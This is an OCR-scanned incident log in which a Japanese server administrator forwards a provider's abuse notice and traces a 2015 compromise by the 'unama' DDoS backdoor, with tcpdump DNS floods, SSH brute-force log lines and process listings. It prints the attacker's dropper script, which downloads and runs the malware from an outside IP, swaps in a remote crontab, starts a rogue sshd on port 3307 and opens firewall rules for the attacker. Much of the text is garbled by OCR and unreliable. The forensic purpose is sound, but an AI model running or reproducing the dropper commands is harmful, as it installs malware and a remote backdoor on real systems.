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Forwarded by myoffice@i-hearts.jp

----------------------- Original Message ----------=--===-------

From: abuse@sakura.ad.jp

To:  myoffice@i-hearts.jp

Date: Fri, 11 Dec 2015 15:53:47 +0900
Subject: 00D O0O0ODOO OO0OOODOODOODOO (15-A6364-01)
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18:22:01.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 27628+ A? rp2.zhuquzhou.com. (35)
18:22:01.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 49949+ A? rp2.zhuquzhou.com. (35)
18:22:01.000000 IP 49.212.176.26.44233 > 123.151.182.52.53: 63112+ A? rp2.zhuquzhou.com. (35)
18:22:01.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 41317+ A? rp2.zhuquzhou.com. (35)
18:22:01.000000 IP 49.212.176.26.44233 >116.211.121.145.53: 15640+ A? rp2.zhuquzhou.com. (35)
18:22:01.000000 IP 49.212.176.26.44233 > 116.211.121.145.53: 47766+ A? rp2.zhuquzhou.com. (35)
18:22:01.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 61053+ A? rp2.zhugquzhou.com. (35)
18:22:02.000000 IP 49.212.176.26.44233 > 116.211.121.145.53: 674+ A? rp2.zhuquzhou.com. (35)
18:22:02.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 5797+ A? rp2.zhuquzhou.com. (35)
18:22:02.000000 IP 49.212.176.26.44233 > 113.207.76.125.53: 21441+ A? rp2.zhugquzhou.com. (35)
18:22:02.000000 IP 49.212.176.26.44233 > 116.211.121.145.53: 33825+ A? rp2.zhuquzhou.com. (35)
18:22:02.000000 IP 49.212.176.26.44233 > 123.151.182.52.53: 17691+ A? rp2.zhuquzhou.com. (35)
18:22:02.000000 IP 49.212.176.26.44233 > 123.151.182.52.53: 41167+ A? rp2.zhuquzhou.com. (35)
18:22:02.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 36511+ A? rp2.zhuquzhou.com. (35)
18:22:03.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 52262+ A? rp2.zhuquzhou.com. (35)
18:22:03.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 46898+ A? rp2.zhuquzhou.com. (35)
18:22:03.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 49482+ A? rp2.zhuquzhou.com. (35)
18:22:04.000000 IP 49.212.176.26.44233 > 113.207.76.124.53: 30985+ A? rp2.zhuquzhou.com. (35)
18:22:04.000000 IP 49.212.176.26.44233 > 113.207.76.125.53: 41241+ A? rp2.zhuquzhou.com. (35)

oo

#1-2015/12/1119:45-00 00O

[root@www14012uf admin]# top

top - 17:19:10 up 451 days, 3:36, 2 users, load average: 0.18, 0.20, 0.18

Tasks: 175 total, 3 running, 172 sleeping, O stopped, O zombie

Cpu(s): 10.4%us, 2.4%sy, 0.0%ni, 86.8%id, 0.0%wa, 0.0%hi, 0.4%si, 0.0%st

Mem: 1922596k total, 1612796k used, 309800k free, 79808k buffers

Swap: 2097144k total, 372396k used, 1724748k free, 1095004k cached
PIDUSER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
4128 root 20 O 103m 2776 444 S 8.6 0.1 330:24.46 unama
28599 apache 20 0 351m 22m 12mS 5.6 1.2 0:06.40 httpd

ooooooooo

[root@www14012uf admin]# ps ax | grep unama

41287 Ssl 330:27 /bin/unama

30088 pts/1 D+ 0:00 grep unama

[root@www14012uf admin]# ps -eo Istart,pid,args } grep unama

Tue Dec 8 02:41:03 2015 4128 /bin/unama

Fri Dec 11 18:13:00 2015 5814 grep unama

12/82410 00000000
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[root@www14012uf admin]# Il /bin/unama
-rwxrwxrwx 1 root root 1223123 110 18 01:07 2015 unama

rootU00000000O..

gooobooogoo
[root@www14012uf admin]# tcpdump -sO -i ethO -X
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ethO, link-type EN1OMB (Ethernet), capture size 65535 bytes
18:02:18.197005 IP www14012uf.sakura.ne.jp.34395 > 140.205.228.11.domain: 50280+ A? pianyiyao.cn. (30)
0x0000: 4500 003a 0000 4000 4011 e7eb 31d4 bO1a E......1..
0x0010: 8ccd e40b 865b 0035 0026 52ff c468 0100 ....[.5.&R..h..
0x0020: 0001 0000 0000 0000 0970 6961 6e79 6979 ... pianyiy
0x0030: 616f 0263 6e00 0001 0001 ao.cn.....
18:02:18.197135 IP www14012uf.sakura.ne.jp.34395 > 140.205.228.21.domain: 38674+ A? pianyiyao.cn. (30)
0x0000: 4500 003a 0000 4000 4011 e7el 31d4 bOla E......1..
0x0010: 8ccd e415 865b 0035 0026 5309 9712 0100 ....[.5.&S.....
0x0020: 0001 0000 0000 0000 0970 6961 6e79 6979 ... pianyiy
0x0030: 616f 0263 6e00 0001 0001 ao.cn.....
18:02:18.197138 IP www14012uf.sakura.ne.jp.34395 > 140.205.81.11.domain: 64773+ A? pianyiyao.cn. (30)
0x0000: 4500 003a 0000 4000 4011 7aec 31d4 bOla E....z.1..
0x0010: 8ccd 510b 865b 0035 0026 bffe fd05 0100 .Q.[.5.&......
0x0020: 0001 0000 0000 0000 0970 6961 6e79 6979 ... pianyiy
0x0030: 616f 0263 6e00 0001 0001 ao.cn.....
18:02:18.197140 IP www14012uf.sakura.ne.jp.34395 > 140.205.81.21.domain: 65028+ A? pianyiyao.cn. (30)
0x0000: 4500 003a 0000 4000 4011 7ae2 31d4 bO1la E....z.1..
0x0010: 8ccd 5115 865b 0035 0026 c008 fe04 0100 .Q.[5.&......
0x0020: 0001 0000 0000 0000 0970 6961 6e79 6979 ... pianyiy
0x0030: 616f 0263 6e00 0001 0001 ao.cn.....

0x0000: 4500 003a 0000 4000 4011 5141 31d4 bOla E.....QAL..
0x0010: 2a78 ddOb 865b 0035 0026 €9a9 ce28 0100 *X..[.5.&..(.
0x0020: 0001 0000 0000 0000 0970 6961 6e79 6979 ... pianyiy
0x0030: 616f 0263 6e00 0001 0001 ao.cn.....

0x0000: 4500 003a 0000 4000 4011 5137 31d4 bOla E.....Q71...
0x0010: 2a78 dd15 865b 0035 0026 €9b3 939c 0100 *X..[.5.&......
0x0020: 0001 0000 0000 0000 0970 6961 6e79 6979 ... pianyiy
0x0030: 616f 0263 6e00 0001 0001 ao.cn.....
18:02:18.197146 IP www14012uf.sakura.ne.jp.34395 > 140.205.228.11.domain: 28031+ A? pianyiyao.cn. (30)
0x0000: 4500 003a 0000 4000 4011 e7eb 31d4 b0O1a E......1..
0x0010: 8ccd e40b 865b 0035 0026 52ff 6d7f 0100 ....[.5.&R.m...
0x0020: 0001 0000 0000 0000 0970 6961 6e79 6979 ... pianyiy
0x0030: 616f 0263 6e00 0001 0001 ao.cn.....

goooooooooooon..

gooooooooooboo

[root@www14012uf admin]# kill -9 4128

[root@www14012uf admin]# tail -20000 /var/log/secure > secure.log

3511 Dec 8 02:06:59 www14012uf sshd?31389?: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser=
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rhost=37.35.2.196 user=root

3512 Dec 8 02:07:00 www14012uf sshd?313897?: Failed password for root from 37.35.2.196 port 25907 ssh2

3513 Dec 8 02:07:00 www14012uf sshd?313907?: Received disconnect from 37.35.2.196: 11: Bye Bye

3514 Dec 8 02:07:02 www14012uf sshd?314117?: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser=
rhost=37.35.2.196 user=root

3515 Dec 8 02:07:04 www14012uf sshd?31411?: Failed password for root from 37.35.2.196 port 27793 ssh2

3516 Dec 8 02:07:05 www14012uf sshd?314127?: Received disconnect from 37.35.2.196: 11: Bye Bye

3517 Dec 8 02:07:06 www14012uf sshd?31413?: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser=
rhost=37.35.2.196 user=root

3518 Dec 8 02:07:08 www14012uf sshd?314137?: Failed password for root from 37.35.2.196 port 29870 ssh2

3519 Dec 8 02:07:08 www14012uf sshd?314147?: Received disconnect from 37.35.2.196: 11: Bye Bye

3520 Dec 8 02:07:10 www14012uf sshd?314157?: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser=
rhost=37.35.2.196 user=root

3521 Dec 8 02:07:12 www14012uf sshd?31415?: Failed password for root from 37.35.2.196 port 31910 ssh2

3522 Dec 8 02:07:13 www14012uf sshd?314167?: Received disconnect from 37.35.2.196: 11: Bye Bye

3523 Dec 8 02:07:14 www14012uf sshd?314177?: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser=
rhost=37.35.2.196 user=root

3524 Dec 8 02:07:16 www14012uf sshd?314177?: Failed password for root from 37.35.2.196 port 34170 ssh2

3525 Dec 8 02:07:16 www14012uf sshd?314187?: Received disconnect from 37.35.2.196: 11: Bye Bye

3526 Dec 8 02:07:18 www14012uf sshd?31419?: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser=
rhost=37.35.2.196 user=root

3527 Dec 8 02:07:20 www14012uf sshd?31419?: Failed password for root from 37.35.2.196 port 36345 ssh2

3528 Dec 8 02:07:20 www14012uf sshd?314207?: Received disconnect from 37.35.2.196: 11: Bye Bye

3529 Dec 8 02:07:22 www14012uf sshd?314217?: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser=
rhost=37.35.2.196 user=root

3530 Dec 8 02:07:24 www14012uf sshd?314217: Failed password for root from 37.35.2.196 port 38233 ssh2

3531 Dec 8 02:07:24 www14012uf sshd?314227?: Received disconnect from 37.35.2.196: 11: Bye Bye

3532 Dec 8 02:07:26 www14012uf sshd?314247?: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser=
rhost=37.35.2.196 user=root

3533 Dec 8 02:07:28 www14012uf sshd?314247?: Failed password for root from 37.35.2.196 port 40473 ssh2

3534 Dec 8 02:07:28 www14012uf sshd?314257?: Received disconnect from 37.35.2.196: 11: Bye Bye

root0 000000000000
ooooooOoOoooooooOoO0oooOoOoooo0o00o

unamal 000000000 OrootD OO0

[root@www14012uf admin]# find / -name "*unama*" -Is
6553613 1196 -rwxrwxrwx 1root root 1223123 120 11 18:23 /bin/unama

[root@www14012uf admin]# grep -R "unama” /var/www/

[root@www14012uf admin]# Il -R /var/www/ | grep "12[0 *2015"

#2-2015/12/1121:11-00 00O

[root@www14012uf admin]# Il /tmp/
00 3140

-Aw-r—F- 1 root root 0120 802:41 2015 myou.file
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-Pw-r—r- 1 root root 528 120 7 01:19 2015 rcs.sh.1
rw-r—r- 1 root root 528 1200 7 01:19 2015 rcs.sh.10
-~ 1 root root 528 120 7 01:19 2015 rcs.sh.100

Irwxrwxrwx 1 root root 14 120 8 02:41 2015 su -> /usr/sbin/sshd
-rwxrwxrwx 1 root root 1223123 120 11 19:48 2015 unama

[root@www14012uf admin]# Il /bin/ | grep 2015

mw-—f- 1 rootroot 73 120 11 20:02 2015 conf.n
-rwxr-xr-x 1 root root 1223123 1200 11 20:02 2015 netstat
-rwxr-xr-x 1 root root 1223123 12[] 11 20:02 2015 ps
-rwxr-xr-x 1 root root 1223123 1200 11 20:02 2015 unama

[root@www14012uf admin]# Il /usr/bin/ | grep 2015
drwxr-xr-x 2 root root 4096 12[01 8 02:41 2015 bsd-port
drwxr-xr-x 2 root root 4096 1200 8 02:41 2015 dpkgd

[root@www14012uf logs]# cat /tmp/rcs.sh.1

rm -rf shell.sh

wget -P /bin http://173.254.230.36:8080/unama
chmod 777 /bin/funama

nohup /bin/unama > /tmp/myou.file 2>&1

rm -rf /etc/crontab

wget -P /etc http://173.254.230.84:8080/crontab

In -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=3307

iptables -A INPUT -s 45.34.1.151 -p tcp --dport 6379 -j ACCEPT
iptables -A OUTPUT -d 45.34.1.151 -p tcp --sport 6379 -j ACCEPT
iptables -A INPUT -s 45.34.1.151 -p tcp --dport 3307 -j ACCEPT
iptables -A OUTPUT -d 45.34.1.151 -p tcp --sport 3307 -j ACCEPT
/etc/rc.d/init.d/iptables save

#3-2015/12/1413:31-00 00O

[root@Ilocalhost admin]# Il /etc/init.d/ | grep 2015

-rwxr-xr-x 1 rootroot 23 1200 14 12:33 2015 DbSecuritySpt
-rwxr-xr-x 1 root root 2644 50 20 00:25 2015 mongod
-rwxr-xr-x 1 root root 1702 600 25 15:23 2015 redis_6379
-rwxr-xr-x 1 root root 36 120 14 12:33 2015 selinux
[root@localhost admin]# cat /etc/init.d/DbSecuritySpt
#1/bin/bash

/bin/unama

[root@localhost admin]# cat /etc/init.d/selinux

#1/bin/bash

/usr/bin/bsd-port/getty

[root@localhost admin]# Il /usr/bin/bsd-port/getty

-rwxr-xr-x 1 root root 1223123 12[1 14 12:33 2015 /usr/bin/bsd-port/getty

Linux.BackDoor.Gates.5—0 00 0O LinuxD OO OO0
http://news.drweb.co.jp/show/?i=744&#38;Ing=ja&#38;c=2
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#4 -2015/12/14 13:50-00 00O

https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

sSHOOOOOOOoOoOooooobOOdOroot O

!

goooooboobobobooo

!

ceCOoooooooono

!
ceCOODOd0D0O0DO0DO0bO0ObOO0ObODOoDbOobDOoDOoDOoD
/etc/init.d/

/etc/cron.d/

/boot/

!
gooobooboobobobobobooooboboobobooboo

#5-2015/12/14 1351 -00 00O

http://logic.moo.jp/data/archives/644.html

#6 -2015/12/141352-00 00O

https://dogmap.jp/2011/05/12/vps-security/

#7-2015/12/16 17:09-00 00O
-00 0000000000 0000000 -FIGHT AGAINSTUNAMAO OO
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